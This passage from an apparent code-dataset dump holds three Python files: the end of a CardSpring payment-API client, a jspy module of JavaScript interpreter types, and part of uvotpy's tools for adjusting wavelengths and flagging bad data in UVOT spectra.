return response
def createACard(csID,cardNumber,exp):
authenticate()
values = {'pan':cardNumber,'expiration':exp}
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/cards',data)
def retrieveACard(csID,token):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/users/'+csID+'/cards/'+token)
def deleteABusinessConnection(businessID):
auth = authenticateWithHttplib2()
response = auth['h'].request("https://api.cardspring.com/v1/businesses/"+businessID+"/connection", method = "DELETE", headers = auth['header'])
return response
######################################################################
##### BUSINESS ACTIONS #####
######################################################################
def getAllBusinesses(filters):
authenticate()
data = urllib.urlencode(filters)
return urllib2.urlopen('https://api.cardspring.com/v1/businesses',data)
def getABusiness(businessID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID)
def getAllStores(businessID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID+'/stores')
def getAStore(businessID,storeID):
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+businessID+'/stores/'+storeID)
def createBusinessConnection(businessID):
authenticate()
values = {'permissions' :'notification,purchase_data,redemption', 'authorization':'signature'}
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/businesses/'+ businessID+'/connection', data)
def getBusinessConnections(activity):
authenticate()
values = {'connection':activity}
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/businesses',data)
######################################################################
##### RANDO ACTIONS #####
######################################################################
def getPublisherInfo():
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1')
def getAllEvents():
authenticate()
return urllib2.urlopen('https://api.cardspring.com/v1/events')
# Only in Test Environment....
def testTransaction(values):
authenticate()
data = urllib.urlencode(values)
return urllib2.urlopen('https://api.cardspring.com/v1/transactions',data)
|
UTF-8
|
Python
| false | false | 2,012 |
19,645,180,417,994 |
5e9dc644ed88e3611caf66e64373a91be2a7870a
|
7ce912c0a0d67a5bd6ffafae1b95d00feb88c899
|
/jspy/js.py
|
f72c3a2616cc854ecb4ec501507a8525d177815f
|
[] |
no_license
|
saner/jspy
|
https://github.com/saner/jspy
|
22ce6119fe18a389c1ef3031756455f33ef0bf3a
|
2d4dc3f8ee9ed3c81a468d04e7575edb7f023eda
|
refs/heads/master
| 2021-01-16T22:40:41.366460 | 2011-10-11T20:01:16 | 2011-10-11T20:01:16 | 2,456,322 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""Module containing basic JavaScript types and objects."""
from collections import namedtuple
import sys
UNDEFINED = object()
EMPTY = object()
NORMAL = object()
BREAK = object()
CONTINUE = object()
RETURN = object()
THROW = object()
# Completion specification type as defined in [ECMA-262 8.9]
Completion = namedtuple('Completion', 'type value target')
EMPTY_COMPLETION = Completion(NORMAL, EMPTY, EMPTY)
def is_abrupt(completion):
return completion.type is not NORMAL
class Object(object):
"""JavaScript Object as defined in [ECMA-262 8.6]."""
def __init__(self, items=None):
if items is None:
items = {}
self.d = items
def __getitem__(self, name):
return self.d[str(name)]
def __setitem__(self, name, value):
self.d[str(name)] = value
def get(self, name):
try:
return self.d[str(name)]
except KeyError:
return UNDEFINED
def get_binding_value(self, name):
return self[name]
def set_mutable_binding(self, name, value):
self[name] = value
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.d)
def __eq__(self, other):
return self.d == other.d
class Array(Object):
"""JavaScript Array as defined in [ECMA-262 15.4]."""
max_repr_len = 23
def __init__(self, items=None):
if items is None:
items = []
super(Array, self).__init__()
for i, item in enumerate(items):
self[float(i)] = item
def __repr__(self):
items = list(sorted((int(float(key)), value) for key, value in self.d.items()))
max_key = items[-1][0] if len(items) > 0 else -1
shown_items = [self.get(float(i)) for i in range(0, min(max_key, self.max_repr_len) + 1)]
return 'Array(%r)' % shown_items
def __str__(self):
items = list(sorted((int(float(key)), value) for key, value in self.d.items()))
max_key = items[-1][0] if len(items) > 0 else -1
shown_items = [self.get(float(i)) for i in range(0, min(max_key, self.max_repr_len) + 1)]
return '[%s]' % ', '.join(str(item) for item in shown_items)
class Function(object):
"""Function object as defined in [ECMA-262 15.3].
Algorithm for creating Function objects is in [ECMA-262 13.2]."""
def __init__(self, parameters, body, scope):
self.parameters = parameters
self.body = body
self.scope = scope
self.declared_vars = body.get_declared_vars()
def call(self, this, args):
"""Internal [[Call]] method of Function object.
See [ECMA-262 13.2.1] for a basic algorithm."""
function_context = self.prepare_function_context(args)
result = self.body.eval(function_context)
if result.type is RETURN:
return result.value
else:
# No return statement in function
return UNDEFINED
def prepare_function_context(self, args):
local_vars_dict = dict((name, UNDEFINED) for name in self.declared_vars)
local_vars_dict.update(self.prepare_args_dict(args))
return ExecutionContext(local_vars_dict, parent=self.scope)
def prepare_args_dict(self, args):
result = {'arguments': args}
for name in self.parameters:
result[name] = UNDEFINED
for name, value in zip(self.parameters, args):
result[name] = value
return result
def __repr__(self):
return 'Function(parameters=%r, body=%r, scope=%r)' % (self.parameters,
self.body,
self.scope)
class NativeFunction(object):
"""Function implemented in Python, callable from JavaScript code."""
def __init__(self, f):
self.f = f
def call(self, this, args):
return self.f(this, args)
def __repr__(self):
return 'NativeFunction(f=%r)' % (self.f)
class Console(Object):
"""Global `console` object, behaving similar to Firebug's one."""
def __init__(self, out=None):
self.out = out if out is not None else sys.stdout
self.d = {'log': NativeFunction(self.log)}
def log(self, this, args):
self.out.write(' '.join(str(arg) for arg in args))
self.out.write('\n')
class ReferenceError(RuntimeError):
pass
class ExecutionContext(object):
def __init__(self, env, parent=None):
assert isinstance(env, dict)
self.env = env
self.parent = parent
def __getitem__(self, name):
try:
return self.env[name]
except KeyError:
if self.parent is None:
raise ReferenceError('Reference %r not found in %r' % (name, self))
return self.parent[name]
def __setitem__(self, name, value):
self.env[name] = value
def get_binding_value(self, name):
return self[name]
def set_mutable_binding(self, name, value):
if name not in self.env:
if self.parent is None:
# XXX: Should I support strict or non-strict mode?
# raise ReferenceError("%r is not declared" % name)
self.env[name] = value
else:
self.parent.set_mutable_binding(name, value)
else:
self.env[name] = value
def get_this_reference(self):
return self['this']
def __repr__(self):
return 'ExecutionContext(%r, parent=%r)' % (self.env, self.parent)
class Reference(object):
"""JavaScript reference specification type as defined in [ECMA-262 8.7]."""
def __init__(self, name, base):
self.name = name
self.base = base
def is_unresolvable(self):
return self.base is UNDEFINED
def has_primitive_base(self):
return isinstance(self.base, (basestring, float, bool))
def is_property(self):
return isinstance(self.base, Object) or self.has_primitive_base()
def get_value(self):
if self.is_unresolvable():
raise ReferenceError("%r is unresolvable" % self)
return self.base.get_binding_value(self.name)
def put_value(self, value):
if self.is_unresolvable():
raise ReferenceError("%r is unresolvable" % value)
self.base.set_mutable_binding(self.name, value)
def __repr__(self):
return 'Reference(%r, %r)' % (self.name, self.base)
def get_value(obj):
"""Returns a value of `obj`, resolving a reference if needed.
See [ECMA-262 8.7.1] for details."""
if isinstance(obj, Reference):
return obj.get_value()
else:
return obj
def put_value(obj, value):
"""Sets the value of `obj` reference to `value`.
See [ECMA-262 8.7.2] for details."""
if isinstance(obj, Reference):
obj.put_value(value)
else:
raise ReferenceError("Can't put a value of non-reference object %r" % obj)
|
UTF-8
|
Python
| false | false | 2,011 |
8,564,164,793,648 |
726390acbe3782b427b55f37c3d46ff42c597949
|
a1e3bdc5b6b1efdf94f09799c38f7f44ba025c4e
|
/uvotpy/uvotspec.py
|
3d7de0837b8d0a21041952f6187025ff95d96ca3
|
[
"BSD-3-Clause"
] |
permissive
|
svalenti/uvotpy
|
https://github.com/svalenti/uvotpy
|
73e31c35408a314c3aa02c971d2fb1799d043a0a
|
6eacccf4e8bf4b8ca90994f2a51e09bb74d4d3d2
|
refs/heads/master
| 2021-01-18T04:18:53.260847 | 2014-06-02T11:33:21 | 2014-06-02T11:33:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
'''
Work with UVOT spectra:
- adjust the wavelengths
- flag bad quality data
'''
# Developed by N.P.M. Kuin (MSSL/UCL)
__version__ = '20140424-0.0.1'
import numpy as np
import matplotlib.pyplot as plt
from stsci.convolve import boxcar
from astropy.io import fits
from matplotlib.lines import Line2D
# data
spdata = {
'HI':[
{'name':'Ly-alpha' ,'transition':'1s-2' ,'wavevac':1215.67, 'label':r'Ly$\alpha$'},
{'name':'Ly-beta' ,'transition':'1s-3' ,'wavevac':1025.722, 'label':r'Ly$\beta$'},
{'name':'Ly-gamma' ,'transition':'1s-4' ,'wavevac':972.537, 'label':r'Ly$\gamma$'},
{'name':'Ly-limit' ,'transition':'1s-40','wavevac':912.3, 'label':r'Ly-limit'},
{'name':'H-alpha' ,'transition':'2-3' ,'wavevac':6564.63, 'label':r'H$\alpha$'},
{'name':'H-beta' ,'transition':'2-4' ,'wavevac':4862.69, 'label':r'H$\beta$'},
{'name':'H-gamma' ,'transition':'2-5' ,'wavevac':4341.69, 'label':r'H$\gamma$'},
{'name':'H-delta' ,'transition':'2-6' ,'wavevac':4102.899, 'label':r'H$\delta$'},
{'name':'H-epsilon','transition':'2-7' ,'wavevac':3971.202, 'label':r'H$\epsilon$'},
{'name':'H-6' ,'transition':'2-8' ,'wavevac':3890.16, 'label':r'H6'},
{'name':'H-limit' ,'transition':'2s-40','wavevac':3656, 'label':r'Ba-limit'},
{'name':'Pa-alpha' ,'transition':'3-4' ,'wavevac':18756.096, 'label':r'Pa$\alpha$'},
{'name':'Pa-beta' ,'transition':'3-5' ,'wavevac':12821.576, 'label':r'Pa$\beta$'},
{'name':'Pa-gamma' ,'transition':'3-6' ,'wavevac':10941.082, 'label':r'Pa$\gamma$'},
{'name':'Pa-delta' ,'transition':'3-7' ,'wavevac':10052.123, 'label':r'Pa$\delta$'},
{'name':'Pa-5' ,'transition':'3-8' ,'wavevac':9548.587, 'label':r'Pa5'},
{'name':'Pa-limit' ,'transition':'3s-40','wavevac':8252.2, 'label':r'Pa-limit'},
],
'HeI':[
{'transition':'1s2p 3Po-1s3s 3S ','wavevac':7067.14 ,'label':u'HeI'},
{'transition':'1s2p 1Po-1s3d 1D ','wavevac':6679.9956 ,'label':u'HeI'},
{'transition':'1s2p 3Po-1s3d 3D ','wavevac':5877.249 ,'label':u'HeI'},
{'transition':'1s2s 1S -1s3p 1Po','wavevac':5017.0772 ,'label':u'HeI'},
{'transition':'1s2s 3Po-1s4d 4D ','wavevac':4472.735 ,'label':u'HeI'},
{'transition':'1s2s 3S -1s3p 3Po','wavevac':3889.75 ,'label':u'HeI'},
{'transition':'1s2s 3S -1s4p 3Po','wavevac':3188.667 ,'label':u'HeI'},
{'transition':'2p2 3P -2p3d 3Do','wavevac':3014.59 ,'label':u'HeI'},
{'transition':'1s2s 3S -1s5p 3Po','wavevac':2945.967 ,'label':u'HeI'},
{'transition':'1s2 1S -1s1p 1Po','wavevac':584.334 ,'label':u'HeI'},
],
'HeII':[
{'transition':'4 - 6','wavevac':6562.0, 'label':u'HeII'},
{'transition':'4 - 7','wavevac':5411.5, 'label':u'HeII'},# see J.D.Garcia and J.E. Mack,J.Opt.Soc.Am.55,654(1965)
{'transition':'3 - 4','wavevac':4687.1, 'label':u'HeII'},
{'transition':'3 - 5','wavevac':3203.95,'label':u'HeII'},
{'transition':'3 - 6','wavevac':2734.13,'label':u'HeII'},
{'transition':'3 - 7','wavevac':2511.2, 'label':u'HeII'},
{'transition':'3 - 8','wavevac':2385.4, 'label':u'HeII'},
{'transition':'2 - 3','wavevac':1640.47,'label':u'HeII'},
{'transition':'2 - 4','wavevac':1215.17,'label':u'HeII'},
{'transition':'2 - 6','wavevac':1025.30,'label':u'HeII'},
],
'nova':[ # add also H, HeI, HeII
#
{'transition':'','wavevac':1750 , 'label':u'NIII]'},
{'transition':'','wavevac':1908.7, 'label':u'CIII]'},
{'transition':'','wavevac':2143 , 'label':u'NII]'},
#{'transition':'','wavevac':2151.0, 'label':u'NIV]'},
{'transition':'','wavevac':2297 , 'label':u'CIII'},
{'transition':'','wavevac':2325.4, 'label':u'CII'},
{'transition':'','wavevac':2326.1, 'label':u'CII'},
{'transition':'','wavevac':2471.0, 'label':u'OII]'},
{'transition':'5D-3D','wavevac':2473, 'label':u'Ni IV]'},
{'transition':'5D-3D','wavevac':2522.5, 'label':u'Ni IV]'},
{'transition':'','wavevac':2796.4, 'label':u'MgII'},
{'transition':'','wavevac':2803.5, 'label':u'MgII'},
{'transition':'','wavevac':2937.4, 'label':u'MgII*'},
{'transition':'','wavevac':3130.0, 'label':u'OII*,OIII*,OIV*'},
{'transition':'','wavevac':3345.8, 'label':u'[NeV]'},
{'transition':'','wavevac':3425.9, 'label':u'[NeV]'},
{'transition':'','wavevac':3727 , 'label':u'[OIII]'},
{'transition':'','wavevac':4363 , 'label':u'[OIII]'},
{'transition':'','wavevac':4636 , 'label':u'NIII*'},
{'transition':'','wavevac':4643 , 'label':u'NIII*'},
{'transition':'','wavevac':4648.7, 'label':u'CIII*'},
{'transition':'','wavevac':4651.2, 'label':u'OIII*'},
{'transition':'','wavevac':4959 , 'label':u'[OIII]'},
{'transition':'','wavevac':5007 , 'label':u'[OIII]'},
{'transition':'','wavevac':5755 , 'label':u'[NII]'},
#{'transition':'','wavevac':.0, 'label':u''}
#{'transition':'','wavevac':.0, 'label':u''}
],
'V339_Del':[ # add also H, HeI, HeII
#
{'transition':'2-4' ,'wavevac':4862.69, 'label':r'H$\beta$'},
{'transition':'2-5' ,'wavevac':4341.69, 'label':r'H$\gamma$'},
{'transition':'2-6' ,'wavevac':4102.899, 'label':r'H$\delta$'},
{'transition':'2-7' ,'wavevac':3971.202, 'label':r'H$\epsilon$'},
#{'transition':'4 - 7','wavevac':5411.5, 'label':u'HeII'},
{'transition':'3 - 4','wavevac':4687.1, 'label':u'He II'},
{'transition':'3 - 5','wavevac':3203.95,'label':u'He II'},
{'transition':'3 - 6','wavevac':2734.13,'label':u'He II+O II*'},
{'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':2747.4, 'label':''},
# unclutter {'transition':'3 - 6','wavevac':2734.13,'label':u'HeII'},
# unclutter {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':2747.4, 'label':u'OII*'},
{'transition':'3 - 7','wavevac':2511.2, 'label':u'He II'},
{'transition':'3 - 8','wavevac':2385.4, 'label':u'He II'},
{'transition':'','wavevac':1750 , 'label':u'N III]'},
{'transition':'','wavevac':1908.7, 'label':u'C III]'},
#{'transition':'','wavevac':1987.7, 'label':u'S IX]*'},
# declutter {'transition':'','wavevac':2143 , 'label':u'N II]'},
{'transition':'','wavevac':2147 , 'label':u'N II]+IV]'},
# declutter {'transition':'','wavevac':2151.0, 'label':u'N IV]'},
#{'transition':'','wavevac':2321.66, 'label':u'O III]'},
{'transition':'','wavevac':2325.6, 'label':u'C II+[O II]'},
{'transition':'','wavevac':2332.1, 'label':''},
# unclutter {'transition':'','wavevac':2325.6, 'label':u'C II'},
# unclutter {'transition':'','wavevac':2332.1, 'label':u'[O III]'},
#{'transition':'5D-3D','wavevac':2437.2, 'label':u'Ni V]'},
{'transition':'','wavevac':2471.0, 'label':u'O II]'},
#{'transition':'','wavevac':2522.5, 'label':u'Ni V]'},
#{'transition':'','wavevac':2784, 'label':u'Mg V]'},
{'transition':'','wavevac':2800, 'label':u'Mg II'},
{'transition':'','wavevac':2844.9, 'label':u'C III]'},
{'transition':'','wavevac':2937.4, 'label':u'Mg II*'},
#{'transition':'','wavevac':2949, 'label':u'Mg V]'},
# unsure of this one {'transition':'','wavevac':2990, 'label':u'Ni VII]'},
{'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':3134.2, 'label':u'O II*'},
# unclutter {'transition':'2s2.2p2(3P)4s-2s2.2p2(3P)3p','wavevac':3287.5, 'label':u'OII*'},
#{'transition':'','wavevac':.0, 'label':u''}
#{'transition':'','wavevac':3132, 'label':u'?Be II ?Fe II '},
#{'transition':'2s2 2p2 3P 0-2s2 2p2 1D 2','wavevac':3301.4, 'label':u'[NeV]'},
# declutter {'transition':'2s2 2p2 3P 1-2s2 2p2 1D 2','wavevac':3346.8, 'label':u'[NeV]'},
# declutter {'transition':'2s2 2p2 3P 1-2s2 2p2 1D 2','wavevac':3426.9, 'label':u'[NeV]'},
#{'transition':'3d4 5D-3d4 3G','wavevac':3446.61, 'label':u'[FeV]'},
{'transition':'','wavevac':3448, 'label':u'N IV*'},
#declutter {'transition':'','wavevac':3444.6, 'label':u'N IV*'},
#declutter {'transition':'','wavevac':3461.4, 'label':u'N IV*'}, # opt. thick, especially at later times
{'transition':'2s2 2p4 3P 2-2s2 2p4 3P 0','wavevac':3461.7, 'label':u'[Ca XIII]'},
#{'transition':'3d4 5D-3d4 3G','wavevac':3464.5, 'label':u'[FeV]'},
{'transition':'','wavevac':4363 , 'label':u'[O III]'},
# declutter {'transition':'','wavevac':4640 , 'label':u'N III*'},
{'transition':'','wavevac':4645, 'label':u'C III*+N III*'},
# declutter {'transition':'','wavevac':4649, 'label':u'C III*'},
{'transition':'','wavevac':4959 , 'label':u'[O III]'},
{'transition':'','wavevac':5007 , 'label':u'[O III]'},
{'transition':'','wavevac':5755 , 'label':u'[N II]'},
#{'transition':'','wavevac':.0, 'label':u''}
#{'transition':'','wavevac':.0, 'label':u''}
],
}
############################
class DraggableSpectrum:
"""
Drag spectrum until the wavelengths are correctly lined up
"""
def __init__(self, ax, spectrum,):
self.spectrum = spectrum
self.press = None
self.delwav = 0.0
self.incwav = 0.0
self.ax = ax
def connect(self):
'connect to all the events we need'
self.cidpress = self.spectrum.figure.canvas.mpl_connect(
'button_press_event', self.on_press)
self.cidrelease = self.spectrum.figure.canvas.mpl_connect(
'button_release_event', self.on_release)
self.cidmotion = self.spectrum.figure.canvas.mpl_connect(
'motion_notify_event', self.on_motion)
self.cidkey = self.spectrum.figure.canvas.mpl_connect(
'key_press_event', self.on_key)
print "active"
def on_press(self, event):
'on button press we will store some data'
if event.inaxes != self.spectrum.axes: return
self.press = event.x, event.y, event.xdata, event.ydata, self.spectrum.get_xdata()
print "start position (%f,%e)"%(event.xdata,event.ydata)
def on_motion(self, event):
'on motion we will move the spectrum if the mouse is over us'
if self.press is None: return
if event.inaxes != self.spectrum.axes: return
x0, y0, xpress, ypress, xdata = self.press
dx = event.xdata - xpress
self.incwav = dx
self.spectrum.set_xdata(xdata+dx)
self.ax.figure.canvas.draw()
def on_release(self, event):
'on release we reset the press data'
self.delwav += self.incwav
self.press = None
self.ax.figure.canvas.draw()
if event.inaxes == self.spectrum.axes:
print "end position (%f,%e)"%(event.xdata,event.ydata)
def on_key(self,event):
'on press outside canvas disconnect '
print "you pushed the |%s| key"%event.key
print "disconnecting ..."
def disconnect(self):
'disconnect all the stored connection ids'
self.spectrum.figure.canvas.mpl_disconnect(self.cidpress)
self.spectrum.figure.canvas.mpl_disconnect(self.cidrelease)
self.spectrum.figure.canvas.mpl_disconnect(self.cidmotion)
self.spectrum.figure.canvas.mpl_disconnect(self.cidkey)
print "disconnected"
def out_delwav(self):
return self.delwav
def uvot_adjust_wavelength_manually(file=None,openfile=None,openplot=None,
ylim=[None,None],ions=['HI','HeII']):
"""manually adjust the wavelength scale
Parameters
----------
file : path
extracted spectral data (i.e., after running uvotgetspec.getSpec()
fileopen : filehandle
opened spectral data file
openplot : axis
axis instance to use
ylim : list(2)
list of length 2 with limits of the Y-axis or None
ions : list
list of ions to use for annotation
valid ions are spdata.keys()
Notes
-----
The header will be updated with the value of the wavelength shift
The wavelengths in the second extension lambda column will be shifted.
The response file will need to be recreated separately.
Returns the figure instance
"""
# data
if openfile != None:
f = openfile
if f.fileinfo(1)['filemode'] != 'update' :
print "reopening the fits file with mode set to update"
filename = f.filename()
try:
f.close()
f = fits.open(filename,mode='update')
except:
raise "reopen fits file with mode set to update, and rerun "
elif file != None:
f = fits.open(file,mode='update')
else:
raise IOError("what ? nothing to adjust?")
# axis instance to use
if openplot != None:
fig = openplot
fig.clf()
else:
fig = plt.figure()
fig.set_facecolor('lightgreen')
ax = fig.add_axes([0.13,0.13,0.8,0.7])
canvas = ax.figure.canvas
ax.set_title("")
# initial plot to get started
w = f[2].data['lambda']
flx = f[2].data['flux']
spectrum, = ax.plot(w, flx, )
# add annotation
if ylim[0] == None:
ylim = ax.get_ylim()
else:
ax.set_ylim(ylim)
for io in ions:
plot_line_ids(ax,ylower=0.8*(ylim[1]-ylim[0])+ylim[0], ion=io)
ax.set_xlabel(u'wavelength($\AA$)')
ax.set_ylabel(u'flux')
fig.show()
print "Now is a good time to select a part of the figure to use for shifting the wavelengths."
# drag figure
#background = canvas.copy_from_bbox(ax.bbox)
newspec = DraggableSpectrum(ax,spectrum)
done = False
delwav = 0
try:
while not done:
if raw_input("Do you want to adjust wavelengths ? (Y) ").upper()[0] == 'Y':
print 'drag the spectrum until happy'
ax.set_title("when done press key")
newspec.connect()
print "The selected wavelength shift is ",newspec.delwav," and will be applied when done. "
# register the shift from the last run
ans = raw_input("When done hit a key")
delwav += newspec.out_delwav()
ax.set_title("")
done = True
newspec.disconnect()
print "wavelength shift found = %s"%(delwav)
f[2].header['WAVSHFT'] = (delwav, "manual wavelength shift applied")
f[2].data['LAMBDA'] = f[2].data['LAMBDA'] + delwav
f[1].header['WAVSHFT'] = (delwav, "manual wavelength shift applied")
f[1].header['COMMENT'] = "Manual wavelength shift not applied to response file."
f.verify()
f.flush()
except:
raise RuntimeError("Some error occurred during the selection of the wavelength shift. No shift was applied.")
newspec.disconnect()
# apply the shift
return fig
class SelectBadRegions:
"""Select the bad regions on a spectrum interactively"""
def __init__(self, ax, spectrum,badregions=[],eps=None,marker='^'):
self.spectrum = spectrum
self.yval = 0
self.region = [0,0] # xstart and xend of bad region in data coordinates
self.badregions = badregions # list of the Line2D for all bad regions (no check but type is matplotlib.lines.Line2D for each list element)
self.line = Line2D([0,0],[0,0],marker=marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
self.ax = ax
if eps == None:
self.epsilon = (ax.get_xlim()[1]-ax.get_xlim()[0])/40 # angstrom
else: self.epsilon = eps
self.marker=marker
def connect(self):
'connect to all the events we need'
self.cidpress = self.spectrum.figure.canvas.mpl_connect(
'button_press_event', self.on_press)
self.cidrelease = self.spectrum.figure.canvas.mpl_connect(
'button_release_event', self.on_release)
self.cidmotion = self.spectrum.figure.canvas.mpl_connect(
'motion_notify_event', self.on_motion)
self.cidkey = self.spectrum.figure.canvas.mpl_connect(
'key_press_event', self.on_key)
print "active"
def on_press(self, event):
'on button press we check if near endpoint of region'
if event.inaxes != self.spectrum.axes: return
self.region[1] = None
# check if near existing Line2D (adjust)
if len(self.badregions) > 0:
print "going through badregions"
for self.line in self.badregions:
xdat = self.line.get_xdata()
#print "*** ",np.abs(xdat[0] - event.xdata)
#print "*** ",np.abs(xdat[1] - event.xdata)
#print "*** ",xdat
if (np.abs(xdat[0] - event.xdata) < self.epsilon) :
print "at point ",xdat[0]," keeping ",xdat[1]," swapping"
k = self.badregions.index(self.line)
xx = self.badregions.pop(k)
self.line.set_xdata(np.array([xdat[1],event.xdata]))
elif (np.abs(xdat[1] - event.xdata) < self.epsilon):
print "at point ",xdat[1]," keeping ",xdat[0]
k = self.badregions.index(self.line)
xx = self.badregions.pop(k)
self.line.set_xdata(np.array([xdat[0],event.xdata]))
else:
print "new line"
self.yval = event.ydata
x0, y0, x1, y1 = event.xdata, self.yval, event.xdata, self.yval
self.line = Line2D([x0,x1],[y0,y1],marker=self.marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
self.ax.add_line(self.line)
else:
# new line
self.yval = event.ydata
x0, y0, x1, y1 = event.xdata, self.yval, event.xdata, self.yval
self.line = Line2D([x0,x1],[y0,y1],marker=self.marker,color='k',lw=2,alpha=0.4,markerfacecolor='gold')
self.ax.add_line(self.line)
print "position [%f,*]"%(event.xdata,)
def on_motion(self, event):
'on motion we will move the spectrum if the mouse is over us'
if self.region[1] is not None: return
if event.inaxes != self.spectrum.axes: return
xdat = self.line.get_xdata()
xdat[-1] = event.xdata
self.line.set_xdata(xdat)
self.ax.figure.canvas.draw()
def on_release(self, event):
'on release we reset the press data'
if event.inaxes != self.spectrum.axes:
self.yval = None
self.region = [0,0]
return
x1,y1 = event.xdata, event.ydata
self.region[1] = event.xdata
self.badregions.append(self.line)
self.ax.figure.canvas.draw()
if event.inaxes == self.spectrum.axes:
print "-> position (%f,%e)"%(event.xdata,event.ydata)
def on_key(self,event):
'on press outside canvas disconnect '
print "you pushed the |%s| key"%event.key
def disconnect(self):
'disconnect all the stored connection ids'
self.spectrum.figure.canvas.mpl_disconnect(self.cidpress)
self.spectrum.figure.canvas.mpl_disconnect(self.cidrelease)
self.spectrum.figure.canvas.mpl_disconnect(self.cidmotion)
self.spectrum.figure.canvas.mpl_disconnect(self.cidkey)
print "disconnected"
def get_badlines(self):
lines = []
for r in self.badregions:
lines.append(r.get_xdata())
return self.badregions, lines
def set_badregions(self,badregions):
self.badregions = badregions
def uvot_flag_bad_manually(file=None,openfile=None,openplot=None,
ylim=[None,None], ):
"""manually flag bad parts of the spectrum
Parameters
----------
file : path
extracted spectral data (i.e., after running uvotgetspec.getSpec()
openfile : filehandle
openplot : matplotlib.figure
figure handle
ylim : list
limits y-axis
Notes
-----
returns
ax:axes instance, fig:figure instance, [f:fits file handle if passed with openfile]
The data quality flag of flagged pixels will be set to "bad"
The header will be updated with the value of the wavelength shift
"""
from uvotgetspec import quality_flags
if openfile != None:
f = openfile
if f.fileinfo(1)['filemode'] != 'update' :
print "reopening the fits file with mode set to update"
filename = f.filename()
try:
f.close()
f = fits.open(filename,mode='update')
except:
raise "reopen fits file with mode set to update, and rerun "
elif file != None:
f = fits.open(file,mode='update')
else:
raise IOError("what ? nothing to adjust?")
# axis instance to use
if openplot != None:
fig = openplot
fig.clf()
else:
fig = plt.figure()
fig.set_facecolor('white')
ax = fig.add_axes([0.08,0.13,0.87,0.7])
canvas = ax.figure.canvas
ax.set_title("")
# initial plot to get started
w = f[2].data['lambda']
flx = f[2].data['flux']
spectrum, = ax.plot(w, flx, )
# highlight bad quality
q = f[2].data['quality']
plotquality(ax,w,q,flag=['bad','zeroth','weakzeroth','overlap'])
# add annotation
if ylim[0] == None:
ylim = ax.get_ylim()
else:
ax.set_ylim(ylim)
#for io in ions:
# plot_line_ids(ax,ylower=0.8*(ylim[1]-ylim[0])+ylim[0], ion=io)
ax.set_xlabel(u'wavelength($\AA$)')
ax.set_ylabel(u'flux')
fig.show()
print "Select bad regions: Zoom in before starting. Rerun for more regions."
# when animating / blitting figure
#background = canvas.copy_from_bbox(ax.bbox)
s = SelectBadRegions(ax,spectrum)
s.set_badregions([])
flag = quality_flags()
done = False
try:
while not done:
if raw_input("Do you want to mark bad regions ? (Y) ").upper()[0] == 'Y':
print 'Select bad wavelengths in the spectrum until happy'
ax.set_title("when done press key")
s.connect()
# register the shift from the last run
ans = raw_input("When done hit the d key, then return, or just return to abort")
badregions, lines = s.get_badlines()
print "got so far: "
for br in lines: print "bad region : [%6.1f,%6.1f]"%(br[0],br[1])
print badregions
ax.set_title("")
s.disconnect()
else:
done = True
except:
raise RuntimeError("Some error occurred during the selection of the bad regions. No changes were applied.")
s.disconnect()
lines = []
#
if len(lines) > 0:
print "The selected bad regions are "
for br in lines: print "bad region : [%6.1f,%6.1f]"%(br[0],br[1])
print " and will be applied to the FITS file.\n "
f[2].header['comment'] = "added bad regions manually (qual=bad)"
for br in lines:
#try:
# find points that are not flagged, but should be flagged
if br[1] < br[0]:
br3 = br[0]; br[0]=br[1]; br[1]=br3
q1 = (check_flag(f[2].data['quality'],'bad') == False)
q = ((f[2].data['lambda'] > br[0]) &
(f[2].data['lambda'] < br[1]) &
q1 &
np.isfinite(f[2].data['quality']) )
f[1].data['QUALITY'][q] = f[1].data['QUALITY'][q] + flag['bad']
f[2].data['QUALITY'][q] = f[2].data['QUALITY'][q] + flag['bad']
#except:
# raise RuntimeError("Some error occurred during writing to file of the bad regions. No changes were applied.")
# s.disconnect()
f.verify()
f.flush()
print "file was updated"
print type(f)
if file == None:
return fig, ax, f
else:
f.close()
return fig,ax
def plot_line_ids(ax,ylower=None,ion='HI',color='k',dash=[0.07,0.10]):
"""add the line ids to the plot
parameters
----------
ax : plot handle
ylower : float
y-level where the bottom of the line should be
ion : ['HI','HeI','HeII',]
key to the ion to be plotted
"""
xlist = spdata[ion]
xlim = ax.get_xlim()
ylim = ax.get_ylim()
dy = dash[0]*(ylim[1]-ylim[0])
dy1 = dash[1]*(ylim[1]-ylim[0])
wave = []
for line in xlist:
if (line['wavevac'] > xlim[0]) & (line['wavevac'] < xlim[1]):
ax.text(line['wavevac'],ylower+dy1,line['label'],fontsize=8,color=color,
horizontalalignment='left',verticalalignment='center',
rotation='vertical' )
wave.append(line['wavevac'])
ax.vlines(wave,ylower,ylower+dy,color='k')
def plotquality(ax,w,quality,flag=['bad'],colors=['c','g','y','m','b','r','k'],alpha=0.2,):
"""add greyscale regions in plot for each quality flag
parameters
----------
ax : matplotlib.axes.Axes instance
w : array
x-axis values
quality : array
quality flags matching x-axis points
flag : list of strings
each list value must be one of the valid keys from quality_flags()
colors : array
color values
alpha : float
alpha value for transparency
"""
from uvotgetspec import quality_flags
flagdefs = quality_flags()
k=0
for fla in flag:
fval = flagdefs[fla]
q = quality >= fval # limit the search
indx = np.where(q)[0] # indx of wave where flag
fval2 = fval*2
loc = quality[q]/fval2*fval2 != quality[q]
v = indx[loc] # indices of the points with this flag
if len(v) > 1: # require at least 2
vrange = []
v1 = v[0]
vlast = v1
for v2 in v[1:]:
if v2-vlast > 1: # require neighboring pixels
#
vrange.append([v1,vlast])
v1 = v2
vlast = v2
